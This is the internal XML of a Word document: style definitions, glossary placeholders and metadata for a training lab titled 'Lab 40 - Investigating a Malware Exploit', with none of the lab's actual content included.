      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tableoffigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="480" w:hanging="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Toaheading">
    <w:name w:val="toa heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents1">
    <w:name w:val="TOC 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents2">
    <w:name w:val="TOC 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="240" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents3">
    <w:name w:val="TOC 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="480" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents4">
    <w:name w:val="TOC 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="720" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents5">
    <w:name w:val="TOC 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="960" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents6">
    <w:name w:val="TOC 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="1200" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents7">
    <w:name w:val="TOC 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="1440" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents8">
    <w:name w:val="TOC 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="1680" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents9">
    <w:name w:val="TOC 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:left="1920" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ColorfulShadingAccent11" w:customStyle="1">
    <w:name w:val="Colorful Shading - Accent 11"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00231dca"/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextBold" w:customStyle="1">
    <w:name w:val="Body Text Bold"/>
    <w:basedOn w:val="TextBody"/>
    <w:next w:val="BodyTextL25"/>
    <w:link w:val="BodyTextBoldChar"/>
    <w:qFormat/>
    <w:rsid w:val="00c73e03"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyTextL25"/>
    <w:link w:val="TitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="00a33890"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="120"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:cs="Times New Roman" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CMDRed" w:customStyle="1">
    <w:name w:val="CMD Red"/>
    <w:basedOn w:val="CMD"/>
    <w:link w:val="CMDRedChar"/>
    <w:qFormat/>
    <w:rsid w:val="00490807"/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="EE0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CMDOutputRed" w:customStyle="1">
    <w:name w:val="CMD Output Red"/>
    <w:basedOn w:val="CMDOutput"/>
    <w:link w:val="CMDOutputRedChar"/>
    <w:qFormat/>
    <w:rsid w:val="00490807"/>
    <w:pPr/>
    <w:rPr>
      <w:color w:val="EE0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003f306a"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
      <w:ind w:left="720" w:hanging="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="003f306a"/>
    <w:pPr>
      <w:widowControl/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="NoList" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="numbering" w:styleId="BulletList" w:customStyle="1">
    <w:name w:val="Bullet_List"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00457934"/>
  </w:style>
  <w:style w:type="numbering" w:styleId="LabList" w:customStyle="1">
    <w:name w:val="Lab List"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00a76665"/>
  </w:style>
  <w:style w:type="numbering" w:styleId="SectionList" w:customStyle="1">
    <w:name w:val="Section_List"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00596998"/>
  </w:style>
  <w:style w:type="numbering" w:styleId="LabList1" w:customStyle="1">
    <w:name w:val="Lab List1"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="003f306a"/>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e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e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table" w:customStyle="1" w:styleId="LabTableStyle1">
    <w:name w:val="Lab_Table_Style1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00c77b29"/>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en.wikipedia.org/wiki/List_of_file_signatures"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glossaryDocument" Target="glossary/document.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6.png"/>
</Relationships>
</file>

<file path=word/_rels/footer2.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5.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0D3D55688E48DDB6EC995446F5394E"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{2B73A043-C8E7-4F9A-9A7A-3BD769F434E4}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="007C2D57" w:rsidRDefault="002B6FB7">
          <w:pPr>
            <w:pStyle w:val="590D3D55688E48DDB6EC995446F5394E"/>
          </w:pPr>
          <w:r w:rsidRPr="00E97C7A">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>[Title]</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="09951B049F3C25469B3156B7C2067A04"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{5AA5A799-F449-D749-9B6A-3FFB255A03E5}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="0023201D" w:rsidRDefault="00FE4D31" w:rsidP="00FE4D31">
          <w:pPr>
            <w:pStyle w:val="09951B049F3C25469B3156B7C2067A04"/>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FB7"/>
    <w:rsid w:val="000A5509"/>
    <w:rsid w:val="001A685C"/>
    <w:rsid w:val="0023201D"/>
    <w:rsid w:val="002B6FB7"/>
    <w:rsid w:val="00401903"/>
    <w:rsid w:val="00661DF4"/>
    <w:rsid w:val="0072293B"/>
    <w:rsid w:val="007C2D57"/>
    <w:rsid w:val="008C4C8D"/>
    <w:rsid w:val="00BC20F1"/>
    <w:rsid w:val="00C755C5"/>
    <w:rsid w:val="00D70917"/>
    <w:rsid w:val="00DA019D"/>
    <w:rsid w:val="00FD20F3"/>
    <w:rsid w:val="00FE4D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4D31"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="590D3D55688E48DDB6EC995446F5394E">
    <w:name w:val="590D3D55688E48DDB6EC995446F5394E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="09951B049F3C25469B3156B7C2067A04">
    <w:name w:val="09951B049F3C25469B3156B7C2067A04"/>
    <w:rsid w:val="00FE4D31"/>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92A1C7-5E37-43BA-8BB5-8175BC5C4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C:\Users\spennock\Curriculum_Development\CAE_Documentation\CAE_Activities_Template\Lab_Template - ILM_2019_Accessibility.dotx</Template>
  <TotalTime>50</TotalTime>
  <Application>LibreOffice/7.3.7.2$Linux_X86_64 LibreOffice_project/30$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>17</Pages>
  <Words>3969</Words>
  <Characters>21519</Characters>
  <CharactersWithSpaces>25155</CharactersWithSpaces>
  <Paragraphs>304</Paragraph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2023-04-30T17:12:00Z</dcterms:created>
  <dc:creator>SP</dc:creator>
  <dc:description>2020</dc:description>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <cp:lastPrinted>2020-07-21T16:33:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-07T22:51:31Z</dcterms:modified>
  <cp:revision>51</cp:revision>
  <dc:subject/>
  <dc:title>Lab 40 - Investigating a Malware Exploit</dc:title>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>